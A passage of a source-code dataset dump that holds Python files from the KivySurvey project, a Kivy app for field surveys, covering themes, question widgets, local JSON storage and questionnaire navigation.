self.pop_subjects()\n self.swap_subjects()\n else:\n self.pop_subjects()\n self.swap_subjects()\n\n def go_forward(self):\n does_page_exist = self.set_next_page()\n survey = self.survey\n questionnaire = self.questionnaire\n next_questionnaire = survey.get_next_questionnaire(questionnaire)\n self.transition.direction = 'left'\n if self.current in ['subjects1', 'subjects2']:\n if next_questionnaire is None:\n if survey.get_allow_add_subjects(questionnaire):\n self.pop_subjects()\n prev_questionnaire = survey.pop_previous_questionnaire()\n self.start_questionnaire(prev_questionnaire)\n else:\n if survey.get_allow_forward(questionnaire):\n survey.store_current_questionnaire(questionnaire)\n self.start_questionnaire(next_questionnaire)\n elif does_page_exist:\n self.save_page()\n self.swap_pages()\n else:\n is_creating_subject = False\n if survey.get_allow_add_subjects(questionnaire) and (\n self.subject_id is None):\n self.subject_id = self.create_subject()\n self.save_page()\n if next_questionnaire is None:\n self.pop_subjects()\n prev_questionnaire = survey.pop_previous_questionnaire()\n self.start_questionnaire(prev_questionnaire)\n elif survey.get_allow_add_subjects(next_questionnaire):\n survey.store_current_questionnaire(questionnaire)\n self.start_questionnaire(next_questionnaire)\n else:\n self.pop_subjects()\n self.swap_subjects()\n\n def start_gps(self, dt):\n try:\n gps.start()\n except:\n pass\n\n def receive_gps(self, **kwargs):\n if kwargs is not {}:\n self.current_location = kwargs\n gps.stop()\n Clock.schedule_once(self.start_gps, self.gps_loc_interval)\n\n def raise_error(self, error_title, error_text):\n self.app.raise_error(error_title, error_text)\n\n def raise_option_dialogue(self, option_title, option_text, options, \n callback):\n self.app.raise_option_dialogue(option_title, option_text, options,\n callback)\n\n def raise_numpad(self, numpad_title, callback, units=None,\n minimum=None, maximum=None, do_decimal=False):\n self.app.raise_numpad(numpad_title, callback, units, \n minimum, maximum, do_decimal)\n\n\nclass KivySurveyApp(FlatApp):\n kivy_survey = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n\n self.setup_font_ramps()\n super(KivySurveyApp, self).__init__(**kwargs)\n self.setup_themes()\n \n\n def build(self):\n EventLoop.window.bind(on_keyboard=self.hook_keyboard) \n return self.setup_kivy_survey()\n\n def hook_keyboard(self, window, key, *largs):\n if key == 27:\n self.root.go_back()\n return True\n\n def setup_font_ramps(self):\n font_styles = {\n 'Display 4': {\n 'font': 'Roboto-Light.ttf', \n 'sizings': {'mobile': (112, 'sp'), 'desktop': (112, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n }, \n 'Display 3': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (56, 'sp'), 'desktop': (56, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n },\n 'Display 2': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (45, 'sp'), 'desktop': (45, 'sp')},\n 'alpha': .65,\n 'wrap': True,\n 'wrap_id': '1',\n 'leading': (48, 'pt'),\n },\n 'Display 1': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (34, 'sp'), 'desktop': (34, 'sp')},\n 'alpha': .65,\n 'wrap': True,\n 'wrap_id': '2',\n 'leading': (40, 'pt'),\n },\n 'Headline': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (24, 'sp'), 'desktop': (24, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '3',\n 'leading': (32, 'pt'),\n },\n 'Title': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (20, 'sp'), 'desktop': (20, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n 'Subhead': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (16, 'sp'), 'desktop': (15, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '4',\n 'leading': (28, 'pt'),\n },\n 'Body 2': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '5',\n 'leading': (24, 'pt'),\n },\n 'Body 1': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '6',\n 'leading': (20, 'pt'),\n },\n 'Caption': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (12, 'sp'), 'desktop': (12, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n },\n 'Menu': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n 'Button': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (14, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n }\n for each in font_styles:\n style = font_styles[each]\n sizings = style['sizings']\n style_manager.add_style(style['font'], each, sizings['mobile'], \n sizings['desktop'], style['alpha'])\n\n style_manager.add_font_ramp('1', ['Display 2', 'Display 1', \n 'Headline', 'Subhead', 'Body 2', 'Body 1'])\n\n def setup_themes(self):\n self.theme_manager.add_theme_type('SubjectButton', SubjectButton)\n variant_1 = {\n 'FlatButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatIconButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n 'FlatToggleButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatCheckBox':{\n 'color_tuple': ('Gray', '0000'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'check_color_tuple': ('LightBlue', '500'),\n 'outline_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'check_scale': .7,\n 'ripple_duration_in': .07,\n 'outline_size': '10dp',\n },\n 'CheckBoxListItem':{\n 'color_tuple': ('Gray', '0000'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'check_color_tuple': ('LightBlue', '500'),\n 'outline_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'check_scale': .7,\n 'ripple_duration_in': .1,\n 'outline_size': '10dp',\n },\n }\n\n variant_2 = {\n 'FlatButton':{\n 'color_tuple': ('Green', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatIconButton':{\n 'color_tuple': ('Green', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n }\n variant_3 = {\n 'FlatIconButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n 'FlatLabel': {\n 'style': 'Display 2',\n 'color_tuple': ('Gray', '1000'),\n },\n 'FlatToggleButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'SubjectButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'CheckBoxListItem':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .07,\n 'icon_color_tuple': ('Gray', '1000'),\n 'check_color_tuple': ('LightBlue', '500'),\n },\n }\n question_headings = {\n 'FlatLabel': {\n 'style': 'Display 1',\n 'color_tuple': ('Gray', '1000'),\n 'do_resize': False\n },\n }\n position_titles = {\n 'FlatLabel': {\n 'style': 'Display 1',\n 'color_tuple': ('LightBlue', '900'),\n 'do_resize': True\n },\n }\n numpad = {\n 'FlatButton': {\n 'style': 'Display 2',\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .07,\n\n },\n }\n self.theme_manager.add_theme('blue', 'variant_1', variant_1)\n self.theme_manager.add_theme('blue', 'variant_2', variant_2)\n self.theme_manager.add_theme('blue', 'variant_3', variant_3)\n self.theme_manager.add_theme('blue', 'question_headings', \n question_headings)\n self.theme_manager.add_theme('blue', 'position_titles', \n position_titles)\n self.theme_manager.add_theme('blue', 'numpad', numpad)\n\n def setup_kivy_survey(self):\n if __name__ != '__main__':\n self.kivy_survey = survey = Builder.load_file(\n construct_target_file_name('kivysurvey.kv', __file__))\n else:\n self.kivy_survey = survey = KivySurvey()\n survey.current_page = current_page = survey.ids.questions1\n survey.current_subjects_page = survey.ids.subjects1\n db_interface = survey.db_interface\n survey.start_questionnaire('household_questionnaire')\n survey.subject_id = 0\n return survey\n\n\n\nif __name__ == '__main__':\n KivySurveyApp().run()" }, { "alpha_fraction": 0.7264957427978516, "alphanum_fraction": 0.7293447256088257, "avg_line_length": 30.909090042114258, "blob_id": "0eae1d09b6066995dad4cb5ed12bfd610159f2cd", "content_id": "93ec370e189d932d842cf5beb8199bc7b89670fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "permissive", "max_line_length": 75, "num_lines": 11, "path": "/kivy_survey/jsontowidget.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom kivy.factory import Factory\n\n\ndef widget_from_json(json_dict):\n\t#Conversion step as python2 kivy does not accept Property names in unicode\n\targs = json_dict['args']\n\tnew_dict = {}\n\tfor each in args:\n\t\tnew_dict[str(each)] = args[each]\n\treturn getattr(Factory, json_dict['type'])(**new_dict)\n" }, { "alpha_fraction": 0.584728479385376, "alphanum_fraction": 0.591942310333252, "avg_line_length": 32.62471389770508, "blob_id": "c4d6bde913657ce0656a07d372a049e0b7a78367", "content_id": "c2ff94cbc599a851b11a35893602ced6b1e77acb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14694, "license_type": "permissive", "max_line_length": 86, "num_lines": 437, "path": "/kivy_survey/surveyquestions.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (BooleanProperty, ObjectProperty, StringProperty,\n NumericProperty, ReferenceListProperty, ListProperty)\nfrom flat_kivy.numpad import NumPad, DecimalNumPad\nfrom kivy.clock import Clock\nfrom kivy.utils import platform\nfrom flat_kivy.ui_elements import (TextInputFocus, \n CheckBoxListItem as CheckboxAnswerWidget, \n FlatPopup as Popup, FlatToggleButton)\nfrom kivy.lang import Builder\nfrom functools import partial\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import NoTransition, SlideTransition\nfrom flat_kivy.utils import construct_target_file_name\nBuilder.load_file(construct_target_file_name('surveyquestions.kv', __file__))\n\n\nclass SurveyQuestion(Widget):\n allow_no_answer = BooleanProperty(False)\n answer = ObjectProperty(None, allownone=True)\n question_name = StringProperty('default_question_name')\n question_text = StringProperty(None)\n validated = BooleanProperty(False)\n font_ramp_tuple = ListProperty(['question_default', '1'])\n do_transition = BooleanProperty(True)\n do_state = BooleanProperty(False)\n\n def __init__(self, **kwargs):\n super(SurveyQuestion, self).__init__(**kwargs)\n self._no_trans = NoTransition()\n self._slide_trans = SlideTransition()\n\n def on_validated(self, instance, value):\n do_transition = self.do_transition\n slide_trans = self._slide_trans\n no_trans = self._no_trans\n try:\n sm = self.ids.sm\n except:\n print(\"can't find sm class\")\n return\n if value:\n if do_transition:\n sm.transition = slide_trans\n sm.transition.direction = 'left'\n else:\n sm.transition = no_trans\n sm.current = 'inactive'\n else:\n if do_transition:\n sm.transition = slide_trans\n sm.transition.direction = 'right'\n else:\n sm.transition = no_trans\n sm.current = 'active'\n\n\n def on_touch_move(self, touch):\n super(SurveyQuestion, self).on_touch_move(touch)\n if self.collide_point(touch.x, touch.y) and self.do_state:\n bm = self.ids.back_manager\n if touch.dx < -15 and self.validated and bm.current == 'no_button':\n bm.transition.direction = 'left'\n bm.current = 'button'\n elif touch.dx > 15 and self.validated and bm.current == 'button':\n bm.transition.direction = 'right'\n bm.current = 'no_button' \n\n def unvalidate(self):\n bm = self.ids.back_manager\n bm.transition.direction = 'right'\n bm.current = 'no_button'\n self.validated = False\n\n def clear_question(self):\n self.answer = None\n self.unvalidate()\n\n def check_answered(self):\n if self.allow_no_answer:\n return True\n else:\n return self.answer is not None\n\n def _schedule_validate(self, dt):\n self._validate(self.validate_question())\n\n def _validate(self, validated):\n if validated:\n self.validated = True\n else:\n self.validated = False\n\n def _schedule_reset_do_transition(self, dt):\n self.do_transition = True\n\n def validate_question(self):\n return self.answer is not None\n\n def to_json(self):\n return self.answer\n\n def from_json(self, json_data):\n self.answer = json_data\n\n\nclass SurveyQuestionNumerical(SurveyQuestion):\n min_answer = NumericProperty(None, allownone=True)\n max_answer = NumericProperty(None, allownone=True)\n do_decimal = BooleanProperty(False)\n numpad_open_callback = ObjectProperty(None)\n do_state = BooleanProperty(True)\n units = StringProperty(None, allownone=True)\n\n\n def numpad_open_callback(self):\n self.kivysurvey.raise_numpad(self.question_text, self.numpad_return_callback,\n units=self.units, minimum=self.min_answer, maximum=self.max_answer,\n do_decimal=self.do_decimal)\n\n def numpad_return_callback(self, value, is_return):\n if value is 0 and is_return:\n value = None\n if is_return:\n Clock.schedule_once(self._schedule_validate, .2)\n self.answer = value\n\n def validate_question(self):\n min_answer = self.min_answer\n max_answer = self.max_answer\n answer = self.answer\n if answer is not None:\n if min_answer is not None and max_answer is not None:\n return min_answer < answer < max_answer\n elif min_answer is not None:\n return min_answer < answer\n elif max_answer is not None:\n return answer < max_answer\n else:\n return True\n else:\n return False\n\n\nclass SurveyQuestionBirthDate(SurveyQuestion):\n day = StringProperty(None, allownone=True)\n month = StringProperty(None, allownone=True)\n year = StringProperty(None, allownone=True)\n current_field = StringProperty(None, allownone=True)\n numpad = ObjectProperty(None)\n numpad_open_callback = ObjectProperty(None)\n numpad_close_callback = ObjectProperty(None)\n day_maximum_value = NumericProperty(31)\n do_state = BooleanProperty(True)\n answer = ReferenceListProperty(day, month, year)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionBirthDate, self).__init__(**kwargs)\n\n def validate_question(self):\n return self.day is not None and (\n self.month is not None and self.year is not None)\n\n def check_answered(self):\n if self.allow_no_answer:\n return True\n else:\n return self.day is not None and (\n self.month is not None and self.year is not None)\n\n def to_json(self):\n return self.answer\n\n def from_json(self, json_data):\n self.set_answer(json_data)\n\n def set_answer(self, answer_value):\n try:\n self.day = answer_value[0]\n self.month = answer_value[1]\n self.year = answer_value[2]\n except:\n self.clear_question()\n \n def clear_question(self):\n self.day = None\n self.month = None\n self.year = None\n\n def check_answered(self):\n if self.allow_no_answer:\n return True\n else:\n return self.day is not None and (\n self.month is not None and self.year is not None)\n\n def on_year(self, instance, value):\n if self.month == '02':\n self.day_maximum_value = self.calculate_days_in_february()\n if self.day is not None and int(self.day) > self.day_maximum_value:\n self.day = None\n\n def calculate_days_in_february(self):\n year = self.year\n if year is not None:\n is_leap_year = False\n year = int(year)\n if year % 4 == 0 and not (year % 100 == 0 and year % 400 != 0):\n is_leap_year = True\n if is_leap_year:\n return 29\n else:\n return 28\n else:\n return 28\n\n def on_month(self, instance, value):\n months_with_31 = ['01', '03', '05', '07', '08', '10', '12']\n months_with_30 = ['04', '06', '09', '11']\n months_with_28 = ['02']\n if value in months_with_31:\n self.day_maximum_value = 31\n elif value in months_with_30:\n self.day_maximum_value = 30\n elif value in months_with_28:\n self.day_maximum_value = self.calculate_days_in_february()\n if self.day is not None and int(self.day) > self.day_maximum_value:\n self.day = None\n\n def open_numpad(self, field):\n self.current_field = field\n title = 'Input ' + field + ': '\n if field == 'day':\n maximum_value = self.day_maximum_value\n elif field == 'month':\n maximum_value = 12\n elif field == 'year':\n maximum_value = 3000\n self.kivysurvey.raise_numpad(title, self.numpad_return_callback,\n maximum=maximum_value,)\n\n def numpad_return_callback(self, value, is_return):\n current_field = self.current_field\n if current_field == 'day':\n if value < 10:\n self.day = '0' + str(value)\n if value == 0:\n self.day = None\n else:\n self.day = str(value)\n elif current_field == 'month':\n if value < 10:\n self.month = '0' + str(value)\n if value == 0:\n self.month = None\n else:\n self.month = str(value)\n elif current_field == 'year':\n if value == 0:\n self.year = None\n else:\n self.year = str(value)\n if is_return:\n self.current_field = None\n Clock.schedule_once(self._schedule_validate, .2)\n\n\nclass SurveyQuestionYesNo(SurveyQuestion):\n answer_group = StringProperty('Default Answers')\n answer1_text = StringProperty('Yes')\n answer2_text = StringProperty('No')\n do_state = BooleanProperty(True)\n no_answer_button = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionYesNo, self).__init__(**kwargs)\n self.setup_no_answer_button()\n Clock.schedule_once(self.setup)\n\n def toggle_function(self, instance):\n buttons = instance.get_widgets(self.answer_group)\n is_button_down = False\n for button in buttons:\n if button.state == 'down':\n is_button_down = True\n self.answer = button.text\n if not is_button_down:\n self.answer = None\n self.answer_valid = is_button_down\n del buttons\n Clock.schedule_once(self._schedule_validate, .2)\n\n def clear_question(self):\n for button in self.answer_layout.children:\n\n button.state = 'normal'\n\n def setup(self, dt):\n pass\n\n def from_json(self, json_data):\n self.set_answer(json_data)\n\n def set_answer(self, new_value):\n self.answer = new_value\n for button in self.answer_layout.children:\n if button.text == new_value:\n button.state = 'down'\n\n def setup_no_answer_button(self):\n self.no_answer_button = no_answer_button = FlatToggleButton(\n text='No Answer', group=self.answer_group, \n on_release=self.toggle_function,\n no_up=True,\n theme=('blue', 'variant_3'),\n height='80dp',\n max_lines=1,\n font_ramp_tuple=self.font_ramp_tuple,\n size_hint=(1., None),)\n \n if self.allow_no_answer:\n self.bind(font_ramp_tuple=no_answer_button.setter(\n 'font_ramp_tuple'))\n self.answer_layout.add_widget(no_answer_button)\n\n def on_answer_group(self, instance, value):\n if self.no_answer_button is not None:\n self.no_answer_button.group = value\n\n def on_allow_no_answer(self, instance, value):\n no_answer_button = self.no_answer_button\n try:\n answer_layout = self.ids.answer_layout\n except:\n Clock.schedule_once(lambda x: partial(\n self.on_allow_no_answer, instance, value), .1)\n return\n if value and no_answer_button not in answer_layout.children:\n answer_layout.add_widget(no_answer_button)\n else:\n if no_answer_button in answer_layout.children:\n answer_layout.remove_widget(no_answer_button)\n\n\nclass SurveyQuestionToggle(SurveyQuestion):\n answer_group = StringProperty('Default Answers')\n button = ObjectProperty(None)\n answer_text = StringProperty('Yes')\n\n def __init__(self, **kwargs):\n super(SurveyQuestionToggle, self).__init__(**kwargs)\n\n def toggle_function(self, instance):\n button = self.button\n if button.state == 'down':\n self.answer = True\n else:\n self.answer = False\n\n def clear_question(self):\n self.button.state = 'normal'\n\n\nclass SurveyQuestionTextInput(SurveyQuestion):\n text_input = ObjectProperty(None)\n do_state = BooleanProperty(True)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionTextInput, self).__init__(**kwargs)\n Clock.schedule_once(self.setup)\n\n def setup(self, dt):\n self.setup_textinput_popup()\n\n def setup_textinput_popup(self):\n self.text_input = text_input = TextInputFocus()\n self.text_input_popup = popup = Popup(title='Input Name', \n size_hint=(1.0, 1.0), content=text_input)\n text_input.bind(text=self.setter('answer'))\n text_input.close_callback = self.close\n text_input.texti.bind(focus=self.on_focus)\n\n def close(self):\n self.text_input_popup.dismiss()\n Window.release_all_keyboards()\n Clock.schedule_once(self._schedule_validate, .2)\n\n def on_focus(self, instance, value):\n if not value:\n Window.release_all_keyboards()\n\n def clear_question(self):\n self.text_input.texti.text = ''\n self.answer = None\n\n\nclass CheckboxQuestion(SurveyQuestion):\n answers = ListProperty(None)\n group = StringProperty('')\n answer_layout = ObjectProperty(None)\n font_ramp_tuple = ListProperty(['default', '1'])\n\n def on_group(self, instance, value):\n self.on_answers(None, self.answers)\n\n def on_answer_layout(self, instance, value):\n if value is not None:\n self.on_answers(None, self.answers)\n\n def on_answers(self, instance, value):\n answer_layout = self.answer_layout\n if answer_layout is not None:\n answer_layout.clear_widgets()\n for answer in value:\n answer_wid = CheckboxAnswerWidget(\n text=answer, group=self.group, size_hint=(1.0, .25),\n theme=('blue', 'variant_3'), font_ramp_tuple=self.font_ramp_tuple)\n self.bind(font_ramp_tuple=answer_wid.setter('font_ramp_tuple'))\n answer_layout.add_widget(answer_wid)\n answer_wid.bind(active=self.set_answer)\n\n def from_json(self, json_data):\n for each in self.answer_layout.children:\n if each.text == json_data:\n each.toggle_checkbox()\n\n\n def set_answer(self, instance, value):\n if value:\n self.answer = instance.text\n else:\n self.answer = None\n\n def clear_question(self):\n for each in self.answer_layout.children:\n each.ids.checkbox.active = False\n" }, { "alpha_fraction": 0.5364280939102173, "alphanum_fraction": 0.5382011532783508, "avg_line_length": 35.92856979370117, "blob_id": "4cf1260daf862911eecd60acba0869f50476f8b4", "content_id": "0c1ff886b0bcb5e8a5cf011615f9d9213afa185b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6204, "license_type": "permissive", "max_line_length": 78, "num_lines": 168, "path": "/kivy_survey/dbinterface.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom datetime import datetime, timedelta, date\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.clock import Clock\n\nclass DBInterface(object):\n\n def __init__(self, kivysurvey, **kwargs):\n super(DBInterface, self).__init__(**kwargs)\n date = self.convert_time_to_json_ymd(self.get_time())\n self.data = data = JsonStore('data/' + date + '.json')\n self.reset_timers = reset_timers = JsonStore('data/reset_timers.json')\n if 'survey_data' not in data:\n data['survey_data'] = {}\n self.kivysurvey = kivysurvey\n #We will preserve entry 0 for application and configuration data\n self.subject_ids = 1\n sub_id = self.get_entry(0, 'data', 'config', 'subject_ids')\n if sub_id is not None:\n self.subject_ids = sub_id\n self.sync = Clock.create_trigger(self.trigger_sync)\n self.check_reset()\n\n def check_reset(self):\n reset_timers = self.reset_timers\n current_time = self.get_time()\n keys_to_del = []\n for each in reset_timers:\n expire_time = self.convert_time_from_json(each)\n if expire_time < current_time:\n data = reset_timers[each]\n self.set_entry(data['subject_id'], data['questionnaire'], \n data['page'], data['question'], None)\n keys_to_del.append(each)\n for key in keys_to_del:\n reset_timers.delete(key)\n \n\n def trigger_sync(self, dt):\n data = self.data\n data._is_changed = True\n data.store_sync()\n\n def get_entry(self, subject_id, questionnaire, page, question):\n data = self.data['survey_data']\n try:\n return data[str(\n subject_id)][questionnaire][page][question]['answer']\n except:\n return None\n\n def get_subjects(self, subject_id, questionnaire):\n data = self.data['survey_data']\n survey = self.kivysurvey.survey\n q = survey.questionnaires[questionnaire]\n if hasattr(q, 'demographic'):\n real_questionnaire = q.demographic\n else:\n real_questionnaire = questionnaire\n try:\n questionnaire_data = data[str(subject_id)][real_questionnaire]\n except:\n return []\n try:\n original_subjects = questionnaire_data['subjects']\n except: \n return []\n if hasattr(q, 'demographic_restrictions'):\n restrictions = q.demographic_restrictions\n subjects_to_return = []\n sub_a = subjects_to_return.append\n for each in original_subjects:\n status = True\n for restric in restrictions:\n data = self.get_entry(each, restric[0], restric[1], \n restric[2])\n restric_type = type(restric[3])\n if restric_type is list:\n minimum, maximum = restric[3]\n if not minimum <= data <= maximum:\n status = False\n\n elif restric_type is unicode:\n if not data == restric[3]:\n status = False\n if status:\n sub_a(each)\n return subjects_to_return\n else:\n return original_subjects\n\n\n def add_subject(self, subject_id, questionnaire, subject_id_to_add):\n data = self.data['survey_data']\n subject_id = str(subject_id)\n if subject_id not in data:\n data[subject_id] = subject_data = {}\n else:\n subject_data = data[subject_id]\n if questionnaire not in subject_data:\n subject_data[questionnaire] = q_data = {'subjects': []}\n else:\n q_data = subject_data[questionnaire]\n q_data['subjects'].append(subject_id_to_add)\n\n def get_unique_id(self):\n ret_id = self.subject_ids\n self.subject_ids += 1\n self.set_entry(0, 'data', 'config', 'subject_ids', self.subject_ids)\n return ret_id\n\n def set_entry(self, subject_id, questionnaire, page, question, answer, \n do_reset=False, reset_in_hours=None):\n data = self.data['survey_data']\n s_id = str(subject_id)\n if s_id not in data:\n data[s_id] = subject_data = {}\n else:\n subject_data = data[s_id]\n if questionnaire not in subject_data:\n subject_data[questionnaire] = q_data = {}\n else:\n q_data = subject_data[questionnaire]\n if page not in q_data:\n q_data[page] = page_data = {}\n else:\n page_data = q_data[page]\n if question not in page_data:\n page_data[question] = q_data = {'answer': None, 'history': {}}\n else:\n q_data = page_data[question]\n if q_data['answer'] != answer:\n time = self.get_time()\n time_stamp = self.convert_time_to_json(time)\n q_data['history'][time_stamp] = answer\n q_data['answer'] = answer\n \n self.sync()\n if do_reset:\n timed = timedelta(hours=reset_in_hours)\n expire_time = time + timed\n expires_at = self.convert_time_to_json(expire_time)\n reset_timers = self.reset_timers\n reset_timers[expires_at] = {'subject_id': subject_id, \n 'questionnaire': questionnaire,\n 'page': page,\n 'question': question}\n\n def get_time(self):\n return datetime.utcnow()\n\n def convert_time_to_json_ymd(self, datetime):\n if datetime is not None:\n return datetime.strftime('%Y-%m-%d')\n else:\n return None\n\n def convert_time_to_json(self, datetime):\n if datetime is not None:\n return datetime.strftime('%Y-%m-%dT%H:%M:%S')\n else:\n return None\n\n def convert_time_from_json(self, jsontime):\n if jsontime is not None:\n return datetime.strptime(jsontime, '%Y-%m-%dT%H:%M:%S')\n else:\n return None\n" }, { "alpha_fraction": 0.5912644267082214, "alphanum_fraction": 0.5943235754966736, "avg_line_length": 32.81609344482422, "blob_id": "ab54ad617af7ed77a0c1f1422be49ea23931fb20", "content_id": "a926f9e948cb38f504a0eddcfaffb7526ddd704c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5884, "license_type": "permissive", "max_line_length": 81, "num_lines": 174, "path": "/kivy_survey/survey.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom jsontowidget import widget_from_json\n\n\nclass Survey(object):\n def __init__(self, json_survey, **kwargs):\n super(Survey, self).__init__(**kwargs)\n self.survey_file = json_survey\n self.questionnaires = {}\n self.prev_questionnaires = []\n self.load_questionnaires()\n\n def load_questionnaires(self):\n json_data = self.survey_file['survey']\n qs = self.questionnaires\n for each in json_data:\n qs[each] = Questionnaire(each, self)\n\n def get_header_definitions(self, questionnaire):\n q = self.questionnaires[questionnaire]\n return q.headers\n\n def get_subject_fields(self, questionnaire):\n q = self.questionnaires[questionnaire]\n return q.subject_fields\n\n def get_next_page(self, questionnaire, current_page):\n q = self.questionnaires[questionnaire]\n page_order = q.page_order\n if current_page is None:\n return page_order[0]\n else:\n index = page_order.index(current_page)\n if index+1 < len(page_order):\n return page_order[index+1]\n else:\n return None\n\n def get_prev_page(self, questionnaire, current_page):\n q = self.questionnaires[questionnaire]\n page_order = q.page_order\n if current_page is None:\n return page_order[-1]\n else:\n index = page_order.index(current_page)\n if index-1 >= 0:\n return page_order[index-1]\n else:\n return None\n\n def get_next_questionnaire(self, current_questionnaire):\n q = self.questionnaires[current_questionnaire]\n return q.next_questionnaire\n\n def get_allow_forward(self, current_questionnaire):\n q = self.questionnaires[current_questionnaire]\n return q.allow_forward\n\n def store_current_questionnaire(self, current_questionnaire):\n self.prev_questionnaires.append(current_questionnaire) \n\n def get_previous_questionnaire(self):\n try:\n return self.prev_questionnaires[-1]\n except:\n return None\n\n def pop_previous_questionnaire(self):\n try:\n return self.prev_questionnaires.pop()\n except:\n return None\n\n def get_allow_add_subjects(self, questionnaire):\n try:\n return self.questionnaires[questionnaire].add_subjects\n except:\n return False\n\n \n\nclass Questionnaire(object):\n\n def __init__(self, name, survey, **kwargs):\n super(Questionnaire, self).__init__(**kwargs)\n self.survey = survey\n self.page_order = []\n self.headers = []\n self.name = name\n json_data = survey.survey_file['survey'][name]\n self.load_pages(name, survey)\n self.load_headers(name, survey)\n self.load_subject_fields(name, survey)\n if 'next_questionnaire' in json_data:\n self.next_questionnaire = json_data[\"next_questionnaire\"]\n else:\n self.next_questionnaire = None\n if 'add_subjects' in json_data:\n self.add_subjects = json_data[\"add_subjects\"]\n else:\n self.add_subjects = False\n if 'allow_forward' in json_data:\n self.allow_forward = json_data[\"allow_forward\"]\n else:\n self.allow_forward = False\n if 'demographic' in json_data:\n self.demographic = json_data['demographic']\n if 'demographic_restrictions' in json_data:\n self.demographic_restrictions = 